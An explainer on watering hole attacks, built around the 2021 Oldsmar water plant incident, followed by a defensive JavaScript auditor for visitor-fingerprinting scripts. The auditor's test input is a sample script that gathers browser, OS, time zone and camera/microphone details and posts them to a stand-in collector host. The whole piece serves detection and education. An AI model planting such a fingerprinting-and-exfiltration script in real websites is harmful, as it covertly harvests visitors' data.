Watering Hole Attack
In what became a classic watering hole attack, a Florida water and wastewater treatment facility contractor inadvertently hosted malicious code on its website, leading to the reported Oldsmar water plant hack in 2021. The cybercriminals behind the attack seemed to have a distinct audience in mind: the malicious code found on the contractor’s site also appeared to target other Florida water utilities, and, perhaps not surprisingly, the site was visited by a browser sourced to the city of Oldsmar on the same day as the hack. The website didn’t launch exploit code. Instead, it injected malware that functioned as a browser enumeration and fingerprinting script, designed to glean information from site visitors, including operating system, browser type, time zone, and the presence of a camera and microphone. The script then sent that information to a remote database hosted on a Heroku app site that also stored the script.
What you need to know: Like a literal watering hole, a watering hole attack is one in which a user’s computer is compromised when they visit an infected website carrying malware designed to infiltrate their network and steal data or financial assets. The specific technique is essentially a zero-day attack, the goal being to infect the computer system to gain access to a network for financial gain or proprietary information.
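A defender reviewing a site's scripts can look for the combination described in the Oldsmar case above: enumeration of OS/browser, time zone and camera/microphone, plus reporting to a host other than the site itself. The following is an added example, not code from the incident or the original article; the pattern list, the two-category threshold, the `contractor.example` and `collector.example` hosts and both sample scripts are constructed assumptions.

```javascript
// Added example: static triage of a page script for visitor-fingerprinting
// behaviour. Category names, threshold and sample inputs are assumptions.
const FINGERPRINT_PATTERNS = {
  os_or_browser: /navigator\.(userAgent|platform|appVersion|userAgentData)/,
  time_zone: /getTimezoneOffset\s*\(|resolvedOptions\s*\(\s*\)\s*\.timeZone/,
  camera_microphone: /mediaDevices\s*\.\s*enumerateDevices/,
};
const SEND_SINK = /\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon\s*\(|\.src\s*=/;
const URL_IN_SOURCE = /https?:\/\/[^\s"'`)<>]+/g;

function auditScript(source, pageHost) {
  // Which enumeration categories named in the article does the script touch?
  const categories = Object.keys(FINGERPRINT_PATTERNS)
    .filter((name) => FINGERPRINT_PATTERNS[name].test(source));

  // Hosts referenced by the script that are not the site serving the page.
  const externalHosts = new Set();
  for (const raw of source.match(URL_IN_SOURCE) || []) {
    try {
      const host = new URL(raw).hostname.toLowerCase();
      if (host !== pageHost && !host.endsWith("." + pageHost)) externalHosts.add(host);
    } catch (_) { /* not a parseable URL, ignore */ }
  }

  const sendsData = SEND_SINK.test(source);
  return {
    categories,
    externalHosts: [...externalHosts].sort(),
    sendsData,
    // Flag only the combination: broad enumeration plus off-site reporting.
    suspicious: categories.length >= 2 && sendsData && externalHosts.size > 0,
  };
}

// Constructed sample inputs (not recovered from the incident).
const SAMPLE_FINGERPRINTER = `
  const info = { ua: navigator.userAgent, os: navigator.platform,
    tz: Intl.DateTimeFormat().resolvedOptions().timeZone };
  navigator.mediaDevices.enumerateDevices().then((d) => {
    info.media = d.map((x) => x.kind);
    fetch("https://collector.example/log", { method: "POST", body: JSON.stringify(info) });
  });`;
const SAMPLE_BENIGN = `
  document.querySelector("#year").textContent = new Date().getFullYear();
  fetch("https://contractor.example/api/news").then((r) => r.json());`;

console.log(auditScript(SAMPLE_FINGERPRINTER, "contractor.example"));
console.log(auditScript(SAMPLE_BENIGN, "contractor.example"));
```

A hit is a prompt for manual review of the script and its destination, since legitimate analytics code uses the same browser APIs.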